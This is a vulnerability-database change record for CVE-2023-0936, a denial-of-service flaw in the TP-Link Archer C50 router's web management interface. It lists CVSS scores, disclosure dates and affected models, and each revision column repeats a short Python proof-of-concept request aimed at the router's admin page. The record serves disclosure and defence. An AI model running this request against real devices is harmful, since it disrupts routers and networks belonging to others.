Field | 03/23/2023 15:44 | 03/23/2023 15:49 | 03/27/2023 22:56 |
---|
vendor | TP-Link | TP-Link | TP-Link |
name | Archer C50 | Archer C50 | Archer C50 |
version | V2_160801 | V2_160801 | V2_160801 |
component | Web Management Interface | Web Management Interface | Web Management Interface |
cwe | 404 (denial of service) | 404 (denial of service) | 404 (denial of service) |
risk | 1 | 1 | 1 |
cvss3_vuldb_av | A | A | A |
cvss3_vuldb_ac | L | L | L |
cvss3_vuldb_pr | N | N | N |
cvss3_vuldb_ui | N | N | N |
cvss3_vuldb_s | U | U | U |
cvss3_vuldb_c | N | N | N |
cvss3_vuldb_i | N | N | N |
cvss3_vuldb_a | H | H | H |
cvss3_vuldb_e | P | P | P |
cvss3_vuldb_rc | R | R | R |
availability | 1 | 1 | 1 |
publicity | 1 | 1 | 1 |
cve | CVE-2023-0936 | CVE-2023-0936 | CVE-2023-0936 |
responsible | VulDB | VulDB | VulDB |
date | 1676934000 (02/21/2023) | 1676934000 (02/21/2023) | 1676934000 (02/21/2023) |
cvss2_vuldb_av | A | A | A |
cvss2_vuldb_ac | L | L | L |
cvss2_vuldb_au | N | N | N |
cvss2_vuldb_ci | N | N | N |
cvss2_vuldb_ii | N | N | N |
cvss2_vuldb_ai | C | C | C |
cvss2_vuldb_e | POC | POC | POC |
cvss2_vuldb_rc | UR | UR | UR |
cvss2_vuldb_rl | ND | ND | ND |
cvss3_vuldb_rl | X | X | X |
cvss2_vuldb_basescore | 6.1 | 6.1 | 6.1 |
cvss2_vuldb_tempscore | 5.2 | 5.2 | 5.2 |
cvss3_vuldb_basescore | 6.5 | 6.5 | 6.5 |
cvss3_vuldb_tempscore | 5.9 | 5.9 | 5.9 |
cvss3_meta_basescore | 6.5 | 6.5 | 6.5 |
cvss3_meta_tempscore | 5.9 | 6.3 | 6.3 |
price_0day | $0-$5k | $0-$5k | $0-$5k |
language | Python | Python | Python |
sourcecode | import requests
import time
device_web_ip = '192.168.0.1'
request = {'HEAD' :
{'Host' : '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie' : 'Authorization',
'Upgrade-Insecure-Requests' : '1',
'Cache-Control' : 'max-age=0'
},
'ATTR':
{'URL': 'http://{}/'.format(device_web_ip),
'METHOD': 'GET',
'VERSION': 'HTTP/1.1'
}
}
headers = request['HEAD']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
try:
r = requests.request(method=method,url=url,headers=headers,verify=False,timeout=0.5)
except:
pass | import requests
import time
device_web_ip = '192.168.0.1'
request = {'HEAD' :
{'Host' : '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie' : 'Authorization',
'Upgrade-Insecure-Requests' : '1',
'Cache-Control' : 'max-age=0'
},
'ATTR':
{'URL': 'http://{}/'.format(device_web_ip),
'METHOD': 'GET',
'VERSION': 'HTTP/1.1'
}
}
headers = request['HEAD']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
try:
r = requests.request(method=method,url=url,headers=headers,verify=False,timeout=0.5)
except:
pass | import requests
import time
device_web_ip = '192.168.0.1'
request = {'HEAD' :
{'Host' : '{}'.format(device_web_ip),
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie' : 'Authorization',
'Upgrade-Insecure-Requests' : '1',
'Cache-Control' : 'max-age=0'
},
'ATTR':
{'URL': 'http://{}/'.format(device_web_ip),
'METHOD': 'GET',
'VERSION': 'HTTP/1.1'
}
}
headers = request['HEAD']
method = request['ATTR']['METHOD']
url = request['ATTR']['URL']
try:
r = requests.request(method=method,url=url,headers=headers,verify=False,timeout=0.5)
except:
pass |
cve_assigned | 1676934000 (02/21/2023) | 1676934000 (02/21/2023) | 1676934000 (02/21/2023) |
cve_nvd_summary | A vulnerability was found in TP-Link Archer C50 V2_160801. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221552. | A vulnerability was found in TP-Link Archer C50 V2_160801. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221552. | A vulnerability was found in TP-Link Archer C50 V2_160801. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Web Management Interface. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221552. |
cvss3_nvd_av | | A | A |
cvss3_nvd_ac | | L | L |
cvss3_nvd_pr | | N | N |
cvss3_nvd_ui | | N | N |
cvss3_nvd_s | | U | U |
cvss3_nvd_c | | N | N |
cvss3_nvd_i | | N | N |
cvss3_nvd_a | | H | H |
cvss2_nvd_av | | A | A |
cvss2_nvd_ac | | L | L |
cvss2_nvd_au | | N | N |
cvss2_nvd_ci | | N | N |
cvss2_nvd_ii | | N | N |
cvss2_nvd_ai | | C | C |
cvss3_cna_av | | A | A |
cvss3_cna_ac | | L | L |
cvss3_cna_pr | | N | N |
cvss3_cna_ui | | N | N |
cvss3_cna_s | | U | U |
cvss3_cna_c | | N | N |
cvss3_cna_i | | N | N |
cvss3_cna_a | | H | H |
cve_cna | | VulDB | VulDB |
cvss2_nvd_basescore | | 6.1 | 6.1 |
cvss3_nvd_basescore | | 6.5 | 6.5 |
cvss3_cna_basescore | | 6.5 | 6.5 |
affectedlist | | | TP-Link Archer C50 V2_160801
TP-Link Archer C2v1 V1_170228
TP-Link Archer C20v1 V1_141217
TP-Link Archer C7v2 V1_170228 |